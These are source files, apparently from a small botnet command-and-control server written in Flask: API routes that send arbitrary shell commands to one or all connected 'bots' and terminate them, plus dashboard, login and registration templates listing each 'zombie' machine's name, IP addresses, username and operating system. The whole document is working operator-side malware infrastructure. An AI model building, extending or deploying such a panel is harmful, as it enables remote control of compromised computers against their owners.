C2Server/bots/routes.py
from flask import request, Blueprint, jsonify, render_template
from C2Server.threaded_server import getThreadNameAndIP, CMD_INPUT, CMD_OUTPUT, THREADS, IPS
from flask_login import login_required
from C2Server import OUTPUT_DIR

bots = Blueprint('bots', __name__)

@login_required
@bots.route("/bots/all")
def bots_page():
    return render_template("bots.html", bots=getThreadNameAndIP())

@login_required
@bots.route("/api/<thread_uuid>/execute_command", methods=["POST"])
def execute_command(thread_uuid):
    try:
        if request.method == "POST":
            data = request.get_json()
            command = data.get("command")
            CMD_INPUT[thread_uuid].put(command)
            response = CMD_OUTPUT[thread_uuid].get()
            with open(f"{OUTPUT_DIR}/{thread_uuid}.txt", "w") as f:
                f.write(response)
            return jsonify({"success" : "Command executed successfully"}), 200
        else:
            raise Exception("Invalid request method")
    except Exception as e:
        return jsonify({"error" : str(e)}), 400
    
@login_required
@bots.route("/api/<thread_uuid>/delete_bot", methods=["DELETE"])
def delete_bot(thread_uuid):
    try:
        if request.method == "DELETE":
            CMD_INPUT[thread_uuid].put("quit")
            response = CMD_OUTPUT[thread_uuid].get()
            with open(f"{OUTPUT_DIR}/{thread_uuid}.txt", "w") as f:
                f.write(response)
            return jsonify({"success" : "Bot deleted successfully"}), 200
        else:
            raise Exception("Invalid request method")
    except Exception as e:
        return jsonify({"error" : str(e)}), 400
    
@login_required
@bots.route("/api/execute_all", methods=["POST"])
def execute_all():
    try:
        if request.method == "POST":
            data = request.get_json()
            command = data.get("command")
            for thread_uuid in THREADS:
                CMD_INPUT[thread_uuid].put(command)
            for thread_uuid in THREADS:
                response = CMD_OUTPUT[thread_uuid].get()
                with open(f"{OUTPUT_DIR}/{thread_uuid}.txt", "w") as f:
                    f.write(response)
            return jsonify({"success" : "Command executed successfully"}), 200
        else:
            raise Exception("Invalid request method")
    except Exception as e:
        return jsonify({"error" : str(e)}), 400

C2Server/templates/bots.html
<!DOCTYPE html>
<html lang="en">
<head>
    <title>C&C Server</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='CSS/bots.css') }}">
    <script src="{{ url_for('static', filename='JS/bots.js') }}"></script>
</head>
<body>

    <div class="header">
        <div class="execute-all">
          <input type="text" id="execute-all-input" placeholder="Execute command on all zombies">
          <button id="execute-all-btn" class="execute-btn">Execute</button>
        </div>
        <div class="user-actions">
            <span class="welcome-text">Welcome {{ current_user.username }}</span>
            <form action="{{ url_for('auth.logout') }}" method="POST">
                <button type="submit" class="logout-btn">Logout</button>
            </form>    
        </div>
      </div>

    <div class="title">
        <h1>C&C Server</h1>
    </div>

    <table class="computer-list">
        <thead>
            <tr>
            <th>PC Name</th>
            <th>Private IP</th>
            <th>Public IP</th>
            <th>Username</th>
            <th>Operative System</th>
            <th>Remote Command Execution</th>
            <th>Delete Zombie</th>
            <th>Toggle Output</th>
            </tr>
        </thead>
        <tbody>
            {% for bot in bots %}
            <tr>
                <td>{{ bot['details']['pc_name'] }}</td>
                <td>{{ bot['details']['private_ip'] }}</td>
                <td>{{ bot['details']['public_ip'] }}</td>
                <td>{{ bot['details']['username'] }}</td>
                <td>{{ bot['details']['os'] }}</td>
                <td>
                    <input type="text" id="input-command-{{ bot['thread_uuid'] }}" placeholder="Command">
                    <button class="send-btn" data-thread-uuid="{{ bot['thread_uuid'] }}">Send</button>
                </td>
                <td>
                    <button data-thread-uuid="{{ bot['thread_uuid'] }}" class="delete-btn">Delete</button>
                </td>
                <td>
                    <button class="toggle-output" data-thread-uuid="{{ bot['thread_uuid'] }}">↓</button>
                </td>
            </tr>
            <tr class="output-row" id="output-row-{{ bot['thread_uuid'] }}" style="display: none;">
                <td colspan="8">
                    <div class="output-field" id="output-field-{{ bot['thread_uuid'] }}">
                        <pre>
                            {{ bot['last_output'] }}
                        </pre>
                    </div>
                </td>
            </tr>              
            {% endfor %}
        </tbody>
    </table>

</body>
</html>

C2Server/templates/execute.html
<!DOCTYPE html>
<html>
    <head>
        <title>Execute Command</title>
    </head>
    <body>
        <h1>Execute Command for {{agent_name}}</h1>
        <form action = "/api/{{thread_uuid}}/execute_command" method = "POST">
            <p>Enter Command: </p>
            <input type = "text" name = "command" />
            <input type = "submit" value = "Execute" />
        </form>
        <pre>
            {{command_output}}
        </pre>
    </body>
</html>

C2Server/templates/layout.html
<!DOCTYPE html>
<html>
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

    <link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='CSS/main.css') }}">
</head>
<body>
    <header class="site-header">
      <nav class="navbar navbar-expand-md navbar-dark bg-steel fixed-top">
        <div class="container">
          <p class="navbar-brand mr-4">C2 Server</p>
          <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarToggle" aria-controls="navbarToggle" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
          </button>
          <div class="collapse navbar-collapse" id="navbarToggle">
            <div class="navbar-nav mr-auto">
              <a class="nav-item nav-link" href="{{ url_for('bots.bots_page') }}">Bots</a>
            </div>
            <!-- Navbar Right Side -->
            <div class="navbar-nav">
              <a class="nav-item nav-link" href="{{ url_for('auth.index') }}">Login</a>
              <a class="nav-item nav-link" href="{{ url_for('auth.register_page') }}">Register</a>
            </div>
          </div>
        </div>
      </nav>
    </header>
    <main role="main" class="container">
      <div class="row">
        <div class="col-md-8">
          {% with messages = get_flashed_messages(with_categories=true) %}
            {% if messages %}
              {% for category, message in messages %}
                <div class="alert alert-{{ category }}">
                  {{ message }}
                </div>
              {% endfor %}
            {% endif %}
          {% endwith %}
          {% block content %}{% endblock %}
        </div>
      </div>
    </main>


    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
</html>

C2Server/templates/login.html
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Login Page</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='CSS/login.css') }}">
</head>

<body>

    <div class="login-container">
        <div class="login-header">
            <h2>Login</h2>
        </div>
        <div class="login-form">
            <h3>Welcome!</h3>
            <form action="/api/login" method="POST">
                <div class="input-group">
                    <label for="username">Username</label>
                    <input type="text" id="username" name="username" required>
                </div>
                <div class="input-group">
                    <label for="password">Password</label>
                    <input type="password" id="password" name="password" required>
                </div>
                <button type="submit" class="login-button">LOGIN</button>
            </form>
            <a href="/register" class="register-button">REGISTER</a>
        </div>
    </div>

</body>

</html>

C2Server/templates/register.html
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Register Page</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='CSS/register.css') }}">
</head>

<body>

    <div class="register-container">
        <div class="register-header">
            <h2>Register</h2>
        </div>
        <div class="admin-block">
            <h3>Admin Password</h3>
            <form action="/api/register" method="post">
                <div class="input-group">
                    <input type="password" id="admin-password" name="admin-password" required placeholder="Admin Password">
                </div>
        </div>
        <div class="user-block">
            <div class="input-group">
                <input type="text" id="new-username" name="new-username" required placeholder="New Username">
            </div>
            <div class="input-group">
                <input type="password" id="new-password" name="new-password" required placeholder="New Password">
            </div>
            <button type="submit" class="register-button">REGISTER</button>
        </div>
        </form>
    </div>

</body>

</html>